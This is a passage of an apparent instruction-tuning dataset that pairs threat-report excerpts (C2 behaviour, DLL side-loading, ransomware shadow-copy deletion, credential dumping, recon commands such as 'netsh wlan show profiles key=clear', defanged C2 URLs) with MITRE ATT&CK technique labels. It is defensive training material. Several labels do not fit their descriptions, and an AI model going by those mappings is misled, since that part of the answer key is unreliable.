ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C2 server will respond to the HTTP requests to the \u201cbat&m=d\u201d URL with a batch script that update.vbs will save to the \u201cdn\u201d folder and execute. The output of the downloaded batch script is saved to a text file in the \u201cup\u201d folder and uploaded to the C2 server via an HTTP POST request to the following URL", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document. Upon execution, this Trojan checks to see if it was configured with \"\"BINDERON\"\" to determine if it should extract an embedded payload from a resource named \"\"B\"\", save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the \"\"B\"\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running. Another configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured to execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the system at a specific location by writing its contents in base64-encoded format to the following file\"", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call \u201cServHelper\u201d based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the \u201ctunnel\u201d variant of ServHelper, described in the \u201cMalware Analysis\u201d section", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Contains two DLL function exports: start and ss2 - Not dropped to the disk - Responsible for terminating processes and stopping/disabling services related to endpoint security - Responsible for file encryption - Responsible for creating multiple worker threads for encryption - Responsible for creating the ransom notes - No longer uses the process rundll32.exe as a loader, but instead uses the MegaCortex binary as the DLL loader - Responsible for deleting volume shadow copies using vssadmin.exe and wiping deleted data from all drives using cipher.exe", + "output": "- T1561.001: Disk Wipe - Disk Content Wipe" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright", + "output": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If I open up the WebCacheV01.dat file in ESEDatabaseView or BrowsingHistoryView, I see browsing history leading up to my testing. Initially, I thought it was grabbing a copy of the file from a previous Volume Shadow Copy (VSC) but that isn\u2019t the case. Esentutl.exe is able to use the Volume Shadow Copy service to make a backup of a locked file", + "output": "- T1003.003: OS Credential Dumping - NTDS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including", + "output": "- T1204.002: User Execution - Malicious File\n- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Prior to execution of any recon command to gather information from the target machine, the default codepage of the console is changed to \u201c65001\u201d (utf-8", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes", + "output": "- T1003: OS Credential Dumping\n- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Scheduled tasks enable administrators to run tasks or \u201cjobs\u201d at designated times rather than every time the system is booted or the user logs in. This feature can be implemented via the Windows COM API, which the first versions of Ramsay have tailored. Based on the high ratio of similarity with Carberp\u2019s implementation, it\u2019s highly probable that Ramsay\u2019s implementation was adapted from Carberp\u2019s publicly available source code", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1559.001: Inter-Process Communication - Component Object Model" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks", + "output": "- T1020: Automated Exfiltration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy", + "output": "- T1587.002: Develop Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "persistence: Somewhat interestingly, OSX/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically", + "output": "- T1059.002: Command and Scripting Interpreter - AppleScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on", + "output": "- T1033: System Owner/User Discovery\n- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently. Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell", + "output": "- T1568.001: Dynamic Resolution - Fast Flux DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \"\".exe. Here is an example decoy document: The purpose of the VisualBasic script is to execute the payload. Although the malicious part of the binary is only 2MB, the final file is more than 120MB in size, padded out with random data. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations", + "output": "- T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Listing the C:/ drive contents using cd C:/; ls; - Listing the specific Wi-Fi profile details using netsh wlan show profiles name='<Name>' key=clear; - Listing the drives using Get-PSDrive", + "output": "- T1049: System Network Connections Discovery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Use of zip file that contains a \u201c.lnk\u201d (Windows Shortcut) file. 2) Utilization of double extension trick (sample.doc.lnk) to convince users to open the file. 3) HTA (HTML Application) with VBScript embedded in the \u201c.lnk\u201d file 4) VBScript drops payloads and opens a decoy document or PDF to the user", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware\u2019s second functionality is to gain persistence on an infected machine. After obtaining persistence, the next functionality of Linux Rabbit is to brute force SSH passwords which ultimately allows the malware to install the cryptocurrency miner onto the server. The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is \u201cblacklisted,\u201d it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine\u2019s hostname. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"txt,log} and is also a \"\"cryptojacker,\"\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency\"", + "output": "- T1557: Adversary-in-the-Middle\n- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"\"49B46336-BA4D-4905-9824-D282F05F6576\"\". If the software is found, the implant will hide the AV software window from the view of the infected user\"", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1564.003: Hide Artifacts - Hidden Window" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cmd /c tasklist: Executes this command to collect a list of running processes on victim\u2019s machine and store them in a tmp file", + "output": "- T1005: Data from Local System\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware will actually search through the /Users/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that", + "output": "- T1554: Compromise Host Software Binary\n- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As with much of the malware distributed by TA505, The Trick has appeared in frequent, high-volume campaigns. The campaigns used a mix of attached zipped scripts (WSF, VBS), malicious Microsoft Office documents (Word, Excel), HTML attachments, password-protected Microsoft Word documents, links to malicious JavaScript, and other vectors. The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cisco Talos' previous research has mainly linked this group to CrimsonRAT, but new campaigns show they are expanding their Windows malware arsenal with ObliqueRAT. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. After enabling macros, the file executes CrimsonRAT on the endpoint.Figure 4: The \"\"Download Now\"\" button contains a link to a malicious XLS with CrimsonRAT embedded in it. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. HoneyTraps . Transparent Tribe consistently 